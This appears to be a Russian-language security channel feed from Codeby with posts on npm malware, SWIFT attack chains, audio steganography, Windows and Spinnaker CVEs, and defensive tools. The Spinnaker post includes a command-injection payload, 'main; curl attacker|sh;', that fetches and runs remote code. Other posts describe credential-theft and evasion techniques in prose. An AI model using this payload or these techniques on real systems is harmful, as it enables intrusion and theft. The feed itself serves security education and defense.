Codeby

Взломанные npm-пакеты распространяют вредоносное ПО

⏺️ Специалисты Sonatype Security Research обнаружили два скомпрометированных npm-пакета в экосистеме React Native, которые вместе набирают свыше 30 000 загрузок еженедельно и были изменены для доставки многоэтапного вредоносного ПО.

🧠 Исследователи StepSecure первыми зафиксировали этот случай, выявили вредоносные версии и сообщили создателю пакетов, который сразу же отказался от их поддержки. Анализ C2-инфраструктуры показал совпадение IP-адресов с теми, что ранее ассоциировались с кампанией Glassworm.

🕸 В рамках регулярного сканирования open source экосистем Sonatype наткнулась на вредоносные обновления этих двух React Native пакетов. Пакеты впоследствии удалили из npm, но из-за их широкой популярности в сообществе возникает беспокойство за безопасность dev-сред и CI/CD-пайплайнов.

Процесс извлечения полезной нагрузки осуществляется следующим образом:
1️⃣ Скрипт создает файл с именем init.json в домашнем каталоге пользователя, чтобы предотвратить его повторное выполнение в течение примерно двух дней.
2️⃣ Скрипт опрашивает RPC-терминалы Solana каждые 10 секунд на предмет транзакций, связанных с конкретным адресом кошелька.
3️⃣ При обнаружении транзакции, содержащей поле типа "memo", скрипт рассматривает это поле как контейнер команд.
4️⃣ Числовой префикс удаляется, а оставшееся содержимое анализируется как конфигурационные данные в формате JSON.
5️⃣ JSON-файл содержит закодированный в base64 URL-адрес, указывающий на полезную нагрузку второго этапа.
6️⃣ Скрипт декодирует URL-адрес и загружает полезную нагрузку, отправляя при этом операционную систему хоста в составе запроса.
7️⃣ Заголовки ответа содержат дополнительные параметры, такие как ivbase64 и secretkey .
8️⃣ Полезная нагрузка декодируется в формате base64 и выполняется непосредственно в памяти с помощью eval или виртуальной машины Node.js в изолированной среде на системах, отличных от macOS.

➡️ Встречали подобную атаку ранее?

#npm #malware #react #research

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

19 дней от фишингового письма до терминала SWIFT: как устроены атаки на банки

На одном red team проекте для банка из топ-30 команда прошла путь от spear-phishing письма до операторского АРМ SWIFT за 19 дней. Два файрвола, выделенный VLAN, формально изолированная secure zone — всё это обнулил один сервисный аккаунт с правами на обе зоны. Сегментация превратилась в декорацию.

И это не уникальный случай. Тот же сценарий — почти покадрово — использовала Lazarus Group при взломе Bangladesh Bank ($81 млн украденных средств) и группировка Cobalt в атаке на российский «Глобэкс».

🔑 Главный инсайт: ни одна крупная атака на SWIFT не эксплуатировала уязвимость в самом протоколе. Каждый раз это многонедельная APT-операция через людей и корпоративную сеть вокруг secure zone.

Как выглядит kill chain на практике:

• Initial Access — таргетированное письмо оператору банка. Вложение замаскировано под платёжное поручение или запрос регулятора. PDF с макросами, иногда заражённая USB-флешка. Цель — закрепиться на любой рабочей станции в офисном сегменте.

• Lateral Movement — самая долгая фаза. Атакующий перехватывает пароли через кейлоггер, снимает скриншоты рабочих столов, чтобы понять бизнес-процессы и вычислить операторов SWIFT. Среднее время от проникновения до вывода средств — 3–4 недели. Всё это время сигнатурные детекты молчат: аутентификация идёт под легитимными учётками.

• Финал — формирование поддельных SWIFT-сообщений (MT103 для клиентских переводов, MT202 для межбанковских), модификация серверного ПО Alliance Access, чтобы подавить печать подтверждений и стереть записи из базы транзакций.

⚠️ Отдельный вектор, о котором мало говорят: в России до 2018 года ряд банков работал со SWIFT через сервис-бюро — посредников с доступом к IP-адресам и критической инфраструктуре клиентов. Компрометация одного такого посредника открывала путь сразу к десяткам банков. По сути — supply chain attack на финансовый сектор целой страны.

Что реально помогает защититься:

• EDR-агенты на каждом эндпоинте secure zone (а не только в офисном сегменте) — legacy-системы на Windows Server 2008/2012 часто остаются без покрытия вообще
• Поведенческий анализ аутентификаций — валидные учётки не ловятся сигнатурами
• Жёсткая ревизия сервисных аккаунтов с кросс-зонными правами — именно они превращают сегментацию в фикцию

📌 В полной статье — маппинг каждого шага на MITRE ATT&CK, разбор реальных инцидентов и готовые Sigma-правила для детекта.

https://codeby.net/threads/ataki-na-swift-i-mezhbankovskiye-sistemy-kill-chain-ot-fishinga-do-vyvoda-sredstv.92972/

Шеллкод внутри музыки: почему EDR не слышит малварь в WAV-файлах

Трёхминутный стерео-WAV при 44.1 кГц весит около 30 МБ и содержит порядка 15.8 миллионов сэмплов. Каждый сэмпл — 16-битное число. Замени младший бит в каждом из них — и получишь почти 2 МБ скрытой ёмкости. Амплитуда сдвинется на 1/65536 от полного диапазона. Ухо не заметит. EDR не заметит. Файл звучит как обычная музыка.

Именно так работает LSB-стеганография — самый распространённый способ спрятать payload в аудио. И это не теория из CTF-задач.

🔊 В 2019 году Symantec зафиксировала, что группировка Turla использовала WAV-файлы для доставки кода на заражённые хосты. Параллельно исследователи Cylance нашли криптомайнеры и Metasploit-шеллы внутри аудио. Файлы воспроизводились без щелчков, без артефактов — чистый звук. С тех пор техника только развивается, а детект в большинстве организаций стоит на нуле.

Почему атакующим это удобно:

• Межсетевые экраны и DLP считают аудио безопасным медиаконтентом. GET-запрос на .wav с публичного CDN — для фильтра это «пользователь слушает музыку».
• EDR реагирует на исполняемые файлы и скрипты, а WAV сам по себе не исполняется. Payload извлекает отдельный загрузчик, уже сидящий на хосте.
• Атакующий может обновлять шеллкод, не трогая ничего на эндпоинте — просто заменил WAV на CDN, и бот тянет свежий payload.

🛡 Что с обнаружением? Ни CrowdStrike Falcon, ни Microsoft Defender for Endpoint, ни SentinelOne не инспектируют содержимое аудиофайлов. Поведенческий анализ сработает только на этапе исполнения извлечённого кода. Сам WAV проходит незамеченным.

Но слабые места у техники есть. LSB-стеганография уязвима к статистическому анализу — тест хи-квадрат может выявить аномальное распределение младших битов. Правда, в реальных кампаниях payload шифруют перед встраиванием, и простые статистические тесты перестают работать. Ещё одно ограничение: метод не переживает lossy-сжатие. Если WAV прогнать через MP3-транскодер — шеллкод разрушится. Атакующий привязан к lossless-каналам.

Помимо LSB существуют и другие подходы. Фазовое кодирование прячет данные в фазовых разностях сегментов — устойчивее к обработке, но ёмкость ниже. Спектральное встраивание помещает биты в частоты выше 14–16 кГц, где слух наименее чувствителен. А в той же кампании 2019 года Cylance обнаружила загрузчики на основе rand() с фиксированным seed — WAV звучал как белый шум, но после PRNG-декодирования превращался в полноценный PE-файл.

📖 В полной версии статьи — практические методы обнаружения, инструменты стегоанализа и конкретные скрипты для детекта. Рекомендуем к прочтению.

https://codeby.net/threads/steganografiya-v-audiofailakh-kak-malvar-pryachut-vnutri-wav-i-kak-eto-obnaruzhit.92973/

Windows - В С Ё!

🌐 Microsoft подтвердила активную эксплуатацию уязвимости CVE-2026-32202 в компоненте Windows Shell, которая позволяет красть учётные данные через SMB-аутентификацию. Эта проблема возникла из-за неполного патча для предыдущей уязвимости CVE-2026-21510, выпущенного в феврале 2026 года.

🕸 Уязвимость относится к классу spoofing (CVSS 4.3), но реальный риск выше из-за возможности латерального перемещения в сети. При просмотре папки с вредоносным LNK-файлом (ярлыком) Windows Shell автоматически разрешает UNC-путь в файле, инициируя SMB-соединение с сервером злоумышленника. В результате атакующий получает NTLMv2-хеш учётных данных пользователя без клика или запуска файла — достаточно открыть папку.

🧿 Изначально CVE-2026-21510 эксплуатировалась в атаках на Украину и ЕС в декабре 2025 года; февральский патч заблокировал RCE, но оставил вектор кражи credentials. Полное исправление вышло 14 апреля 2026 в Patch Tuesday (KB5083769 для Windows 11 24H2/25H2), но Microsoft 27 апреля обновила статус, подтвердив exploitation в wild. 28 апреля CISA добавила CVE в KEV-каталог.

↗️ Вектор эксплуатации CVE-2026-32202 основан на автоматическом разрешении UNC-путей в Windows Shell при просмотре папки с вредоносным LNK-файлом (ярлыком), что приводит к принудительной SMB-аутентификации без выполнения файла. Это zero-click сценарий: жертве достаточно открыть папку в Проводнике, чтобы система инициировала NTLM-аутентификацию на контролируемый атакующим сервер:

Цепочка атаки:
1️⃣ Доставка payload: Злоумышленник размещает LNK-файл с UNC-путём вида \\server\share\file.lnk в доступной папке — через email-вложение, фишинговую ссылку на SMB-шар или сетевой ресурс.
2️⃣ Автоматическое разрешение: Жертва открывает папку в Проводнике; Windows Shell парсит LNK и автоматически резолвит UNC-путь, устанавливая SMB-соединение с server от имени текущего пользователя.
3️⃣ Кража NTLMv2-хеша: Сервер захватывает NTLMv2-челлендж/респонс (хеш пароля), не требуя клика по файлу — механизм защиты не блокирует сетевой вызов.
4️⃣ Постэксплуатация: Хеш используется для relay-атаки (NTLM relay на DC для DCSync или lateral movement), оффлайн brute-force или Pass-the-Hash

⬇️ Необходимо установить последнее обновление безопасности Windows KB5083769, отключить SMBv1 и спрятаться под одеяло мониторить UNC/LNK-файлы в сетевом трафике

#windows #cve #smb #lnk

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Три громких утечки, которые ловились одной командой в терминале

Capital One — избыточные привилегии IAM-роли. Майнинг криптовалюты на сайте Los Angeles Times — S3-бакет с ACL public-read-write. Вредоносный код в Twilio SDK — снова открытый бакет. Три инцидента на миллионы долларов, три мисконфигурации, которые ловятся одним проходом checkov -d . по Terraform-шаблону. Но только если сканирование вообще настроено.

NSA в отчёте Mitigating Cloud Vulnerabilities прямо называет мисконфигурации наиболее распространённой уязвимостью облачных сред. А по данным IBM, среднее время обнаружения такого инцидента часто превышает шесть месяцев. В pipeline та же проблема находится за секунды. Разница — в точке, где вы проверяете.

🔍 Тысячи правил в IaC-сканерах сводятся к пяти категориям мисконфигураций:

• Публичный доступ к ресурсам — открытые бакеты, базы данных с publicly_accessible = true, сервисы без ограничения source IP
• Избыточные IAM-привилегии — политики с "Action": "*" и "Resource": "*", дающие полный контроль над аккаунтом
• Отсутствие шифрования — EBS-тома, RDS, S3 без encryption, HTTP без TLS
• Отключённое логирование — CloudTrail не во всех регионах, VPC Flow Logs не настроены, Kubernetes audit logging выключен
• Избыточный сетевой доступ — Security Group с 0.0.0.0/0 на порт 22 или 3389

Каждая категория — прямой enabler для конкретных тактик MITRE ATT&CK. Открытый бакет — это T1580 (Cloud Infrastructure Discovery). Wildcard-роль — T1078.004 (Cloud Accounts). Пробел в логировании — T1562.008 (Disable Cloud Logs), и атакующему даже не нужно ничего отключать, потому что вы сами не включили.

⚙️ Отдельная боль — выбор между сканированием HCL-кода напрямую и сканированием Terraform Plan. Первый подход быстрый, не требует credentials, ставится как pre-commit hook. Но он не видит результат интерполяции переменных. Если значение ACL приходит из var.bucket_acl с дефолтом private, а при деплое кто-то передаёт public-read-write через флаг -var — сканер этого не увидит.

Сканирование Plan JSON решает эту проблему: все переменные уже разрешены, вы видите реальные значения. Но нужен доступ к state backend и cloud API. Оптимальная стратегия — оба подхода последовательно: HCL-сканирование на pre-commit, Plan-сканирование в CI перед apply.

🛡 И ключевой момент: параллельно с preventive-сканированием стоит строить detection-правила в SIEM. Алерт на PutBucketAcl с публичными параметрами, на AttachRolePolicy с wildcard, на AuthorizeSecurityGroupIngress с CIDR 0.0.0.0/0 — это ваша страховка на случай, когда pipeline обошли.

В полной статье — готовые примеры Terraform-кода с мисконфигурациями, маппинг на MITRE ATT&CK и конкретные detection-правила для каждой категории.

https://codeby.net/threads/bezopasnost-infrastructure-as-code-ot-miskonfiguratsii-v-terraform-do-detection-pravila-v-siem.92969/

🕸LogonTracer

Инструмент для расследования инцидентов несанкционированного входа в систему, позволяющий визуализировать и анализировать журналы событий Windows Active Directory. Он сопоставляет имя хоста (или IP-адрес) и имя учетной записи, указанные в событиях, связанных с входом в систему, и отображает их в виде графов. Таким образом можно увидеть, с какой учетной записи и с какого хоста была предпринята попытка входа.

📐Позволяет визуализировать следующие идентификаторы событий, связанных со входом в Windows:
📉4624 — Успешный вход в систему;
📉4625 — Ошибка входа в систему;
📉4662 — Выполнена операция над объектом;
📉4672 — Назначены специальные привилегии;
📉4719 — Изменена политика аудита системы;
📉4720 — Создана учётная запись пользователя;
📉4726 — Удалена учётная запись пользователя;
📉4728 / 4732 / 4756 — Пользователь добавлен в защищённую группу;
📉4729 / 4733 / 4757 — Пользователь удалён из защищённой группы;
📉4768 — Аутентификация Kerberos (запрос TGT);
📉4769 — Сервисный билет Kerberos (запрос ST);
📉4776 — Аутентификация NTLM;
📉5137 — Создан объект службы каталогов;
🖱5141 — Удалён объект службы каталогов.

Включает в себя механизм анализа на основе искусственного интеллекта с использованием моделей OpenAI GPT для интеллектуального обнаружения угроз в дополнение к традиционным подходам, основанным на правилах:
➡️Анализ шаблонов безопасности — автоматическая интерпретация результатов графовых запросов и оценка рисков с помощью сопоставления тактик MITRE ATT&CK;
➡️Автономный агент на основе больших языковых моделей — итеративный ИИ-агент, который самостоятельно генерирует и выполняет запросы Cypher к графу Neo4j для выявления угроз без участия человека;
➡️Сигма-правила, созданные ИИ — преобразование результатов анализа ИИ в развертываемые сигма-правила обнаружения;
➡️Поддержка нескольких языков — ответы ИИ могут генерироваться на английском, японском или французском языках.

Дополнительный анализ
1️⃣ LogonTracer использует PageRank (алгоритм, используемый поисковой системой Google для ранжирования веб-страниц в результатах поиска), скрытую марковскую модель и ChangeFinder для обнаружения вредоносных хостов и учетных записей в журналах событий.

2️⃣ С помощью LogonTracer можно также просматривать журналы событий в хронологическом порядке.

⬇️Установка
Клонируем репозиторий и устанавливаем зависимости.

git clone https://github.com/JPCERTCC/LogonTracer.git
cd LogonTracer
pip3 install -r requirements.txt

Далее необходимо скачать и запустить Neo4j и отредактировать файл конфигурации vi config/config.yml.

settings:
logontracer:
WEB_PORT: "8080"
default_user: "neo4j" # Имя пользователя Neo4j для учетной записи LogonTracer по умолчанию
default_password: "password" # Измените его перед первым запуском

neo4j:
NEO4J_USER: "neo4j"
NEO4J_PASSWORD: "password" # Ваш пароль для Neo4j
NEO4J_SERVER: "localhost"
WS_PORT: "7687"

После этого остается запустить приложение командой python3 logontracer.py --run и открыть его по адресу http://localhost:8080.

#defense #tools #SOC

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

6 строк кода вместо 4 часов реверса: как символьное исполнение ломает CTF-таски

На CSAW CTF 2015 задача «wyvern» из категории Reversing 500 содержала бинарь с десятками вложенных проверок ввода. Ручной реверс в Ghidra — часы работы. Скрипт на 6 строках angr решил её за 15 минут. Автоматически сгенерировал входные данные, удовлетворяющие каждому условию. Не магия, а математика.

🔬 Суть подхода простая. Вместо конкретных значений на вход подаются символические переменные — абстракции, которые могут быть чем угодно. На каждом ветвлении (if, switch, граница цикла) движок создаёт два состояния и накапливает ограничения. В целевой точке — например, при вызове puts("Access granted") — всё передаётся SMT-солверу Z3, который решает систему уравнений и возвращает конкретный ввод. Никакого перебора — чистая математическая задача.

Если целевой точкой назначить вызов strcpy с контролируемым буфером, солвер найдёт ввод, приводящий к buffer overflow. Это уже не CTF — это автоматический поиск уязвимостей в реальных бинарях.

⚡️ Но есть нюансы. Главный враг — path explosion. Каждое ветвление удваивает число состояний. Цикл на 1000 итераций с условием внутри — теоретически 2^1000 путей. А если проверка включает SHA-256 или другую криптографию, Z3 просто не решит constraints за разумное время. Поэтому символьное исполнение — фильтр, а не серебряная пуля.

Теперь к выбору инструмента. Три основных фреймворка:

• angr — самый зрелый и живой. Поддерживает x86/x64, ARM, MIPS. Еженедельные коммиты, богатая документация, десятки готовых примеров. На FlareOn 2015 Challenge 5 — решение за 2 минуты 10 секунд. ASIS CTF Finals 2015 — 3.6 секунды. Лучший выбор для CTF, пентеста, автоматизации рутинного реверса.

• Manticore — от Trail of Bits. Уникальная фишка — поддержка смарт-контрактов Ethereum. Помог обнаружить CVE-2020-5232 (CVSS 8.7) в Ethereum Name Service. Но разработка фактически остановилась — начинать новый проект на нём рискованно.

• Triton — заточен под динамический анализ. Работает не с абстрактным исполнением всех путей, а с конкретной трассой. Идеален для деобфускации, снятия MBA-выражений, точечного анализа конкретного пути исполнения.

🎯 Простое правило выбора: нужен автоматический обход всех путей — angr. Аудит смарт-контрактов — Manticore (с оговорками). Работа с конкретной трассой и деобфускация — Triton.

В полной статье — рабочий код для каждого фреймворка, decision tree выбора инструмента и честный разбор граничных случаев, где символьное исполнение ломается.

https://codeby.net/threads/simvol-noye-ispolneniye-dlya-poiska-uyazvimostei-angr-manticore-i-triton-na-praktike.92962/

🪧Исследователи смогли обойти защиту приложения Евросоюза для проверки возраста менее чем за 2 минуты. На днях Евросоюз представил новое приложение для проверки возраста, которое позволяет пользователям подтверждать свой возраст в интернете, не передавая личные данные платформам. Таким образом, сайтам больше не нужно собирать конфиденциальную информацию.

🧿Критика обрушилась вскоре после того, как один из политических деятелей назвал новое приложение технически совершенным и соответствующим самым высоким стандартам конфиденциальности, подчеркнув, что его открытый исходный код обеспечивает прозрачность.

↗️Способ обойти защиту
Консультант по безопасности Пол Мур обнаружил, что приложение хранит зашифрованный PIN-код локально, но, что особенно важно, шифрование не привязано к хранилищу личных данных пользователя, где хранятся конфиденциальные данные для верификации.

Это открывает возможности для удивительно простого обхода защиты. Удалив определенные значения, связанные с PIN-кодом, из файлов конфигурации приложения и перезапустив его, злоумышленник может установить новый PIN-код, сохранив при этом доступ к учетным данным, созданным в предыдущем профиле.

👉Другие недостатки контроля безопасности приложения
Исследователь также указал на дополнительные уязвимости, которые еще больше упрощают перебор паролей или попытки их обойти:

1️⃣Ограничение скорости, которое обычно используется для предотвращения многократного подбора PIN-кодов, хранится в виде простого счетчика в том же редактируемом файле конфигурации. Обнулите его, и система забудет, сколько попыток уже было предпринято.

2️⃣Биометрическая аутентификация, в свою очередь, управляется одним логическим флагом. Измените его значение с «истина» на «ложь», и приложение просто перестанет использовать биометрическую аутентификацию.

🔁Заявление ЕС
Официальные лица признали, что представленная публике версия еще не является готовым потребительским продуктом, несмотря на то, что ее назвали «готовой». В Еврокомиссии заявили, что представленное приложение «обладает всеми функциями», которые планировались для пользователей, но подчеркнули, что на практике это «все еще демонстрационная версия».

По словам пресс-секретаря, ключевое отличие заключается в том, что приложение еще официально не представлено гражданам. Вместо этого его исходный код опубликован в открытом доступе специально для того, чтобы его можно было изучить.

#news #security #vulnerabilities

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Две девятки по CVSS в Spinnaker: как обычная учётка превращается в shell на production

Spinnaker — платформа для управления деплоями от Netflix, которую используют Google, Cisco и сотни enterprise-команд. В апреле 2026 года в ней нашли две критические уязвимости с оценкой CVSS 9.9. Обе эксплуатируются пользователем без привилегий — достаточно просто быть аутентифицированным.

🔥 CVE-2026-32604 — command injection в clouddriver. Поле version из JSON-запроса к эндпоинту PUT /artifacts/fetch конкатенируется прямо в shell-команду без какой-либо санитизации. Буквально: clouddriver берёт пользовательский ввод и подставляет его в sh -c "git clone --branch YOUR_INPUT...". Точка с запятой в поле version — и вместо клонирования репозитория clouddriver выполняет произвольный код. Никаких специальных ролей не нужно — ни WRITE на application, ни EXECUTE на pipeline.

🔑 CVE-2026-32613 — SpEL-инъекция в Echo, сервисе нотификаций и триггеров. Spring Expression Language позволяет выполнить произвольный Java-код на сервере. Тут нужен WRITE на одно application, но результат тот же — полный RCE.

Почему это так больно? Архитектура Spinnaker построена на модели доверия периметру: Gate аутентифицирует запросы на входе, а дальше все 10+ микросервисов общаются друг с другом внутри Kubernetes-кластера без проверки прав. Получил shell на clouddriver — а там лежат production-credentials к AWS, GCP, Azure. Полностью доверенная зона, без токенов, без вопросов.

⚡️ Цепочка эксплуатации CVE-2026-32604 выглядит до обидного просто:

1. Аутентифицироваться в Gate (любая учётка)
2. Запросить GET /artifacts/credentials — эндпоинт отдаёт список всех artifact accounts без проверки ролей
3. Найти аккаунт с типом TOKEN или USER_PASS
4. Отправить PUT /artifacts/fetch с payload вида "version": "main; curl attacker|sh;"

Всё. Command injection уровня «первый семестр secure coding», а CVSS — 9.9. Clouddriver выполнит ваш скрипт с правами пода, в котором хранятся ключи от production-облаков.

Что делать прямо сейчас:

• Обновиться до Spinnaker 2026.0.1, 2025.4.2 или 2025.3.2
• Проверить, не торчит ли Gate наружу (ZeroPath находила публичные инстансы)
• Аудит artifact accounts — убрать неиспользуемые TOKEN/USER_PASS аккаунты
• Внедрить network policies между микросервисами — модель «доверяй всем внутри кластера» в 2026 году уже не работает

В полной статье — разбор обоих векторов до уровня конкретных строк кода, post-exploitation и то, что видит и не видит blue team.

https://codeby.net/threads/cve-2026-32604-i-cve-2026-32613-rce-v-spinnaker-ot-low-priv-autentifikatsii-do-shell-na-clouddriver-i-echo.92955/

🔎 Auditd: как Linux отслеживает всё, что происходит в системе

Auditd — это встроенная система аудита в Linux, которая записывает кто, что и когда сделал в системе.
Если тебе нужно понять, *кто удалил файл*, *кто получил доступ к /etc/shadow* или *когда изменили конфиг* — это как раз его задача.

❓ Как это работает
Auditd состоит из нескольких частей:
▶️ auditd (демон) — собирает и пишет логи
▶️ auditctl — добавляет правила (что именно отслеживать)
▶️ ausearch / aureport — помогает анализировать логи

🧠 Что можно отслеживать
Auditd умеет фиксировать почти всё:
🔁 доступ к файлам и каталогам
🪧 действия пользователей
❗️ попытки входа
💻 запуск команд
🧾 попытки аутентификации

⬇️ Установка
В большинстве дистрибутивов Auditd доступен из стандартных репозиториев:

Debian / Ubuntu:

apt install auditd audispd-plugins

RHEL / CentOS:

yum install audit

После установки сервис обычно запускается автоматически. При необходимости:

systemctl enable auditd
systemctl start auditd

🎯 Пример использования
Добавим правило для отслеживания изменений файла /etc/passwd:

auditctl -w /etc/passwd -p wa -k passwd_changes

Параметры:
-w — указание файла для наблюдения
-p wa — отслеживание записи (write) и изменения атрибутов (attribute)
-k — ключ для удобного поиска событий

🛡 Расположение логов

Журналы аудита по умолчанию сохраняются в:

/var/log/audit/audit.log

Для анализа рекомендуется использовать:
* ausearch — выборка событий
* aureport — генерация отчетов

#linux #auditd #cybersecurity #infosec #sysadmin #logging #security #devops

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером